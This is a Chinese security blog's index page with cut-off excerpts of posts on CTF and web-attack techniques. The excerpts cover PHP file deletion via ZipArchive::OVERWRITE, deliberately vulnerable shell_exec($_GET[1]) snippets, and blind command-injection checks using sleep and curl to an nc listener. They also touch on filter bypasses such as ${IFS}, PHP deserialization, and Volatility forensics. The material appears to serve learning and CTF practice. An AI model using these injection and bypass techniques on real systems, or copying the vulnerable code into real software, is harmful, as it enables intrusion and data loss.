blue_fantasy的博客

Text.原生类同名函数ZipArchive::open($filename,$flag)当$flag=ZipArchive::OVERWRITE时，就会将$filename的文件删除<?php$a = new ZipArchive();$a -> open("test.txt" , ZipArchive::OVERWRITE);?>在同级目录下新建一个test.txt文件，当如上代码设置时访问该页面，test.txt就会被删除，该方法PHP全版本通杀。接下来以

Text.因为网上已经有很多大牛写过类似的文章了，所以本篇文章是一个总结梳理学习。15位可控字符下的命令执行<?phphighlight_file(__FILE__);if(strlen($_GET[1])<15){ echo strlen($_GET[1]); echo shell_exec($_GET[1]);}else{ exit('too long');}因为只能传入14个字符，但是没有限制命令执行的次数，所以我们的思想可以通过Linux

Text.命令无回显的情况判断方法1.延时2.HTTP请求3.DNS请求<?phphighlight_file(__FILE__);shell_exec($_GET[1]);?>（1）通过传入1=ls|sleep(3)页面加载3秒左右才显示来证明注入语句带入成功传入1=ls|curl 192.168.12.104:8000前先在本机开启nc -lvp 8000（2）通过提前nc监听，利用curl命令进行信息获取（3）提前注册ceye.io平

Text.0x00 前提掌握PHP反序列化的原理，序列化的对应内容及POP链构造。可参看：https://xz.aliyun.com/t/3674，https://xz.aliyun.com/t/6454PHP的反序列化特点：01.PHP 在反序列化时，底层代码是以 ; 作为字段的分隔，以 } 作为结尾(字符串除外)，并且是根据长度判断内容的 ，同时反序列化的过程中必须严格按照序列化规则才能成功实现反序列化 。例如下图超出的abcd部分并不会被反序列化成功。02.当长度不对应的时

Text.0x00 前言本文对我曾接触到过的CTF中的内存取证类题目与USB流量分析类题目进行一个总结类梳理。其中kali里集成了取证神器volatility与流量分析神器tshark0x01 Volatility第一步提取内容镜像信息常用命令volatility -f <xxx.vmem>(或xx.raw) imageinfo使用imageinfo插件获取到基本信息，特别是内存数据是什么操作系统下生成的，这点尤为重要 （如图的WinXPSP2x86） 因为在接下来每

Text.提到RCE漏洞， 我们当然想用cat、chmod、whoami、ifconfig、ls等这些操作对不对！像这些敏感命令，防火墙就会进行过滤。还有特殊字符如单引、双引、空格等等 ，防火墙同样会进行过滤 。那么本篇来学习一下在CTF及实际渗透当中利用RCE的一些姿势空格绕过：在bash下可以用${IFS}、$IFS$9、<、>、<>、{,}、%20(space)、%09(tab, 在URL上使用较多 )这里我测>的时候会卡住，因为>指的是写入，就

Text.__wakeup() //使用unserialize时触发__sleep() //使用serialize时触发__destruct() //对象被销毁时触发__call() //当程序调用到当前类中未声明或没权限调用的方法时触发__callStatic() //在静态上下文中调用不可访问的方法时触发__get() //当程序调用一个未定义或不可见的成员变量时触发，请求类里不存在的属性则自动触发__set() //当程序试图写入一个不存在或不可见的成员变量时触发__isset()